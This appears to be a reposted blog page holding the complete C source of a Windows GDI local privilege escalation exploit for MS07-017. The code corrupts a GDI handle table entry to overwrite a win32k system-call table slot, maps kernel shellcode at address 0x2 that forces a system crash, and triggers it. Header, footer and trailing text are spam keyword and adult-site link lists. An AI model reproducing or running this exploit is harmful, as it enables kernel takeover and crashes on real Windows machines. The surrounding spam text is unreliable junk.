青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

elva

MS Windows GDI Local Privilege Escalation Exploit (MS07-017)

#define _WIN32_WINNT 0x0500
#include <windows.h>
#include <shlwapi.h>
#include <stdio.h>

#pragma comment (lib, "user32.lib")
#pragma comment (lib, "gdi32.lib")
#pragma comment (lib, "shlwapi.lib")
#pragma comment (lib, "ntdll.lib")



/*
Here is a sploit for the GDI MS07-017 Local Privilege Escalation, presented during the last blackhat conferences
by Joel Ericksson. Modify the GdiTable of the current process and by calling good API's changean entry of the
win32k's SSDT by 0x2.

before :
lkd> dps bf998300 L 2
bf998300  bf934921 win32k!NtGdiAbortDoc
bf998304  bf94648d win32k!NtGdiAbortPath

after :
lkd> dps bf998300 L 2
bf998300  00000002
bf998304  bf94648d win32k!NtGdiAbortPath

win32k.sys bDeleteBrush (called by DeleteObject)
mov     esi, [edx] ;esi=pKernelInfo
cmp     [esi+4], ebx ; ebx=0, we need [esi+4]>0
mov     eax, [edx+0Ch]
mov     [ebp+var_8], eax
ja      short loc_BF80C1E7 ;jump if [esi+4] > 0

loc_BF80C1E7:
mov     eax, [esi+24h]  ; [esi+24] = addr to hijack (here win32k SSDT)
mov     dword ptr [eax], 2 ; !!!!!

At 0x2 we allocate memory with NtAllocateVirtualMemory and we copy our payload.

Tested on windows xp sp2 french last updates (before MS07-017)

Coded by Ivanlef0u.
http://ivanlef0u.free.fr

ref:
http://www.Mcft.com/technet/security/bulletin/MS07-017.mspx
http://research.eeye.com/html/alerts/zeroday/20061106.html
http://projects.info-pull.com/mokb/MOKB-06-11-2006.html
https://www.blackhat.com/presentations/bh-eu-07/Eriksson-Janmar/Whitepaper/bh-eu-07-eriksson-WP.pdf
http://www.securityfocus.com/bid/20940/info
*/

typedef struct
{
   DWORD pKernelInfo;
   WORD  ProcessID;
   WORD  _nCount;
   WORD  nUpper;
   WORD  nType;
   DWORD pUserInfo;
} GDITableEntry;

typedef enum _SECTION_INFORMATION_CLASS {
SectionBasicInformation,
SectionImageInformation
}SECTION_INFORMATION_CLASS;

typedef struct _SECTION_BASIC_INFORMATION { // Information Class 0
PVOID BaseAddress;
ULONG Attributes;
LARGE_INTEGER Size;
}SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION;

extern "C" ULONG __stdcall NtQuerySection(
   IN HANDLE SectionHandle,
   IN SECTION_INFORMATION_CLASS SectionInformationClass,
   OUT PVOID SectionInformation,
   IN ULONG SectionInformationLength,
   OUT PULONG ResultLength OPTIONAL
);

extern "C" ULONG __stdcall NtAllocateVirtualMemory(
   IN HANDLE ProcessHandle,
   IN OUT PVOID *BaseAddress,
   IN ULONG ZeroBits,
   IN OUT PULONG AllocationSize,
   IN ULONG AllocationType,
   IN ULONG Protect
);

typedef LONG NTSTATUS;

#define STATUS_SUCCESS  ((NTSTATUS)0x00000000L)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)

typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation=11,
} SYSTEM_INFORMATION_CLASS;

typedef struct _SYSTEM_MODULE_INFORMATION { // Information Class 11
ULONG Reserved[2];
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

extern "C" NTSTATUS __stdcall  NtQuerySystemInformation(         
   IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
   IN OUT PVOID SystemInformation,
   IN ULONG SystemInformationLength,
   OUT PULONG ReturnLength OPTIONAL
);

extern "C" ULONG __stdcall RtlNtStatusToDosError(
  NTSTATUS Status
);


// generic kernel payload, reboot the b0x
unsigned char Shellcode[]={
0x60, //PUSHAD
0x55, //PUSH EBP

0x6A, 0x34,
0x5B,
0x64, 0x8B, 0x1B,
0x8B, 0x6B, 0x10,

0x8B, 0x45, 0x3C,
0x8B, 0x54, 0x05, 0x78,
0x03, 0xD5,
0x8B, 0x5A, 0x20,
0x03, 0xDD,
0x8B, 0x4A, 0x18,
0x49,
0x8B, 0x34, 0x8B,
0x03, 0xF5,
0x33, 0xFF,
0x33, 0xC0,
0xFC,
0xAC,
0x84, 0xC0,
0x74, 0x07,
0xC1, 0xCF, 0x0D,
0x03, 0xF8,
0xEB, 0xF4,
0x81, 0xFF, 0x1f, 0xaa ,0xf2 ,0xb9, //0xb9f2aa1f, KEBugCheck
0x75, 0xE1,
0x8B, 0x42, 0x24,
0x03, 0xC5,
0x66, 0x8B, 0x0C, 0x48,
0x8B, 0x42, 0x1C,
0x03, 0xC5,
0x8B, 0x04 ,0x88,
0x03, 0xC5,

0x33, 0xDB,
0xB3, 0xE5,
0x53,
0xFF, 0xD0,

0x5D, //POP EBP
0x61, //POPAD
0xC3 //RET
};   


ULONG GetWin32kBase()
{
   ULONG i, Count, Status, BytesRet;
   PSYSTEM_MODULE_INFORMATION pSMI;
   
   Status=NtQuerySystemInformation(SystemModuleInformation, pSMI, 0, &BytesRet); //allocation length
   if(Status!=STATUS_INFO_LENGTH_MISMATCH)
      printf("Error with NtQuerySystemInformation : 0x%x : %d \n", Status, RtlNtStatusToDosError(Status));
   
   pSMI=(PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, BytesRet);
   
   Status=NtQuerySystemInformation(SystemModuleInformation, pSMI, BytesRet, &BytesRet);
   
   if(Status!=STATUS_SUCCESS)
      printf("Error with NtQuerySystemInformation : 0x%x : %d \n", Status, RtlNtStatusToDosError(Status));
   
   /*
   The data returned to the SystemInformation buffer is a ULONG count of the number of
   handles followed immediately by an array of
   SYSTEM_MODULE_INFORMATION.
   */
   
   Count=*(PULONG)pSMI;
   pSMI=(PSYSTEM_MODULE_INFORMATION)((PUCHAR)pSMI+4);
   
   for(i=0; i<Count; i++)
   {   
      if(StrStr((pSMI+i)->ImageName, "win32k.sys"))
         return (ULONG)(pSMI+i)->Base;
   }
   
   HeapFree(GetProcessHeap(), HEAP_NO_SERIALIZE, pSMI);
   
   return 0;   
}   



   
ULONG buff[500]={0};
   
int main(int argc, char* argv[])
{
   ULONG i, PID, Status, Old;
   LPVOID lpMapAddress=NULL;
   HANDLE hMapFile=(HANDLE)0x10;
   GDITableEntry *gdiTable;
   SECTION_BASIC_INFORMATION SBI;
   WORD Upr;
   ULONG Size=0x1000;
   PVOID Addr=(PVOID)0x2;
   
   printf("Windows GDI MS07-017 Local Privilege Escalation Exploit\nBy Ivanlef0u\n"
   "http://ivanlef0u.free.fr\n"
   "Be MAD!\n");
   
   //allocate memory at addresse 0x2
    Status=NtAllocateVirtualMemory((HANDLE)-1, &Addr, 0, &Size, MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE);
    if(Status)
       printf("Error with NtAllocateVirtualMemory : 0x%x\n", Status);
    else
       printf("Addr : 0x%x OKAY\n", Addr);   
   
   memcpy(Addr, Shellcode, sizeof(Shellcode));
   


    printf("win32.sys base : 0x%x\n", GetWin32kBase());
   
   ULONG Win32kSST=GetWin32kBase()+0x198300; //range between win32k imagebase and it's SSDT
   printf("SSDT entry : 0x%x\n", Win32kSST); //win32k!NtGdiAbortDoc
   
   
   
   HBRUSH hBr;
   hBr=CreateSolidBrush(0);

   Upr=(WORD)((DWORD)hBr>>16);
   printf("0x%x\n", Upr);

   while(!lpMapAddress)
   {
      hMapFile=(HANDLE)((ULONG)hMapFile+1);
      lpMapAddress=MapViewOfFile(hMapFile, FILE_MAP_ALL_ACCESS, 0, 0, 0);
   }

   if(lpMapAddress==NULL)
   {
      printf("Error with MapViewOfFile : %d\n", GetLastError());
      return 0;
   }

   Status=NtQuerySection(hMapFile, SectionBasicInformation, &SBI, sizeof(SECTION_BASIC_INFORMATION), 0);
   if (Status) //!=STATUS_SUCCESS (0)
   {
      printf("Error with NtQuerySection (SectionBasicInformation) : 0x%x\n", Status);
      return 0;
   }

   printf("Handle value : %x\nMapped address : 0x%x\nSection size : 0x%x\n\n", hMapFile, lpMapAddress, SBI.Size.QuadPart);
   gdiTable=(GDITableEntry *)lpMapAddress;
   PID=GetCurrentProcessId();
   
   for (i=0; i<SBI.Size.QuadPart; i+=sizeof(GDITableEntry))
   {
      if(gdiTable->ProcessID==PID && gdiTable->nUpper==Upr) //only our GdiTable and brush
      {   

         printf("gdiTable : 0x%x\n", gdiTable);
         printf("pKernelInfo : 0x%x\n", gdiTable->pKernelInfo);
         printf("ProcessID : %d\n", gdiTable->ProcessID);
         printf("_nCount : %d\n", gdiTable->_nCount);
         printf("nUpper : 0x%x\n", gdiTable->nUpper);
         printf("nType : 0x%x\n", gdiTable->nType );
         printf("pUserInfo : 0x%x\n\n", gdiTable->pUserInfo);
         
         Old=gdiTable->pKernelInfo;
      
         gdiTable->pKernelInfo=(ULONG)buff; //crafted buff
         break;
      }
      gdiTable++;
   }

   if(!DeleteObject(hBr))
      printf("Error with DeleteObject : %d\n", GetLastError());
   else
      printf("Done\n");

   printf("Buff : 0x%x\n", buff);
   memset(buff, 0x90, sizeof(buff));
   
    buff[0]=0x1; //!=0
    buff[0x24/4]=Win32kSST; //syscall to modifY
   buff[0x4C/4]=0x804D7000; //kernel base, just for avoiding bad mem ptr

    if(!DeleteObject(hBr))
      printf("Error with DeleteObject : %d\n", GetLastError());   
      
   gdiTable->pKernelInfo=Old; //restore old value
   
   /*   
   lkd> uf GDI32!NtGdiAbortDoc
   GDI32!NtGdiAbortDoc:
   77f3073a b800100000      mov     eax,1000h
   77f3073f ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
   77f30744 ff12            call    dword ptr [edx]
   77f30746 c20400          ret     4
   */

   __asm
   {
      mov eax, 0x1000
      mov edx,0x7ffe0300
      call dword ptr [edx]   
   }
   
   return 0;
}

download

posted on 2007-05-08 16:49 葉子 閱讀(801) 評論(0)  編輯 收藏 引用 所屬分類: 網絡安全

青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            国产欧美日韩一区二区三区在线 | 亚洲欧洲一区二区三区久久| 亚洲欧美视频在线| 亚洲尤物影院| 国产在线麻豆精品观看| 免费成人高清视频| 欧美高清视频一区二区三区在线观看 | 亚洲看片网站| 欧美网站在线| 久久精品最新地址| 久久亚洲视频| 日韩亚洲一区二区| 亚洲视频网在线直播| 国产午夜久久| 亚洲国产免费| 欧美日韩国产天堂| 久久gogo国模裸体人体| 毛片基地黄久久久久久天堂| 99精品国产在热久久婷婷| 一本色道久久综合亚洲精品高清| 国产精品视频yy9299一区| 久久久久久久久伊人| 免费在线观看一区二区| 亚洲欧美日韩国产一区二区三区| 午夜亚洲激情| 日韩视频精品在线观看| 中日韩视频在线观看| 伊人色综合久久天天五月婷| 亚洲精品1区2区| 国产亚洲欧美日韩精品| 欧美大片一区二区| 国产精品视区| 欧美风情在线| 国产日韩欧美日韩| 亚洲激情视频在线| 韩国精品主播一区二区在线观看| 亚洲国产日日夜夜| 国产有码一区二区| 亚洲一区亚洲| 正在播放亚洲一区| 美女日韩欧美| 久久人人精品| 国产欧美不卡| 一区二区三区波多野结衣在线观看| 精品成人在线| 欧美一区国产在线| 午夜精品av| 欧美日韩美女在线| 亚洲激情视频在线播放| 在线日本欧美| 久久国产婷婷国产香蕉| 午夜视黄欧洲亚洲| 欧美午夜精品久久久久免费视| 欧美xx69| 在线观看成人av| 久久激情网站| 久久超碰97中文字幕| 国产精品白丝黑袜喷水久久久| 亚洲激情在线| 亚洲美女中文字幕| 欧美激情精品久久久久久久变态| 麻豆91精品91久久久的内涵| 国产亚洲精品一区二555| 亚洲欧美日韩在线高清直播| 中日韩美女免费视频网站在线观看 | 亚洲制服丝袜在线| 欧美日韩国语| 一本久久综合亚洲鲁鲁五月天| 9久草视频在线视频精品| 欧美福利电影在线观看| 亚洲七七久久综合桃花剧情介绍| 亚洲日本中文字幕免费在线不卡| 老司机午夜精品| 亚洲第一天堂av| 亚洲另类视频| 欧美三级日韩三级国产三级| 夜夜嗨av一区二区三区| 亚洲欧美成人一区二区在线电影 | 午夜亚洲性色视频| 欧美在线观看一区二区| 国产午夜精品一区二区三区视频 | 女生裸体视频一区二区三区| 亚洲国产精品v| 亚洲一区在线免费| 国产区在线观看成人精品| 久久精品国产99国产精品| 麻豆精品视频在线观看| 亚洲精品看片| 国产乱肥老妇国产一区二| 欧美在线亚洲在线| 亚洲国产成人精品视频| 亚洲午夜精品一区二区| 国产精品一区视频网站| 久久这里有精品15一区二区三区| 亚洲国产精品免费| 香蕉久久国产| 亚洲美女一区| 国产一区二区三区高清| 欧美成人dvd在线视频| 亚洲天堂偷拍| 免费观看成人鲁鲁鲁鲁鲁视频 | 亚洲电影av在线| 欧美日韩一区不卡| 欧美一区二区三区喷汁尤物| 欧美护士18xxxxhd| 亚洲欧美在线磁力| 亚洲精品国产精品国自产观看浪潮 | 国产精品腿扒开做爽爽爽挤奶网站| 久久大香伊蕉在人线观看热2| 亚洲国产婷婷香蕉久久久久久| 亚洲在线网站| 亚洲毛片网站| 精久久久久久久久久久| 国产精品成人观看视频国产奇米| 久久久久久香蕉网| 亚洲欧美在线x视频| 亚洲精品视频一区| 久久视频这里只有精品| 亚洲一区二区免费| 亚洲精品欧洲| 在线视频观看日韩| 国产日韩精品一区观看| 欧美日韩视频在线一区二区观看视频| 校园春色国产精品| 亚洲天堂av电影| 亚洲激情校园春色| 欧美国产一区二区| 女人色偷偷aa久久天堂| 久久国产精品99精品国产| 亚洲一区二区在线看| 亚洲美女在线观看| 亚洲人成啪啪网站| 亚洲国产精品久久久久秋霞蜜臀| 国产视频在线观看一区| 国产精品乱人伦中文| 欧美日韩妖精视频| 欧美激情精品久久久六区热门| 麻豆精品在线视频| 蜜臀av一级做a爰片久久| 久久理论片午夜琪琪电影网| 久久国产精品网站| 午夜视频在线观看一区| 午夜精品一区二区在线观看| 亚洲淫片在线视频| 亚洲自拍高清| 欧美在线观看视频在线| 午夜一区二区三区不卡视频| 亚洲欧美日韩精品在线| 亚洲欧美日韩另类| 久久电影一区| 久久一区二区精品| 猛干欧美女孩| 欧美日本三级| 国产精品成人va在线观看| 国产精品香蕉在线观看| 国产亚洲日本欧美韩国| 一区二区三区在线看| 亚洲丁香婷深爱综合| 亚洲区一区二区三区| 亚洲精品乱码| 亚洲一区二区在线看| 欧美一区视频在线| 久久综合综合久久综合| 欧美黑人在线观看| 一区二区三区你懂的| 午夜久久影院| 麻豆精品精品国产自在97香蕉| 欧美成人蜜桃| 国产精品嫩草影院av蜜臀| 国产亚洲高清视频| 91久久亚洲| 性刺激综合网| 欧美国产欧美综合 | 亚洲国产欧美日韩| 中文国产亚洲喷潮| 久久九九国产精品| 欧美日韩国产va另类| 国产午夜精品全部视频播放 | 国产精品福利在线观看网址| 国产亚洲成人一区| 亚洲精品视频在线播放| 亚洲免费在线观看视频| 免费欧美视频| 中文日韩在线| 美女亚洲精品| 国产日韩久久| 日韩一级大片在线| 久久婷婷综合激情| 这里只有精品视频| 欧美二区在线观看| 国语精品一区| 香蕉尹人综合在线观看| 亚洲电影激情视频网站| 欧美一区二区在线免费观看| 欧美激情一区在线观看| 国外成人在线| 欧美一区二区免费| 一本色道久久综合亚洲精品小说| 久久综合色一综合色88| 国产伦精品一区二区三|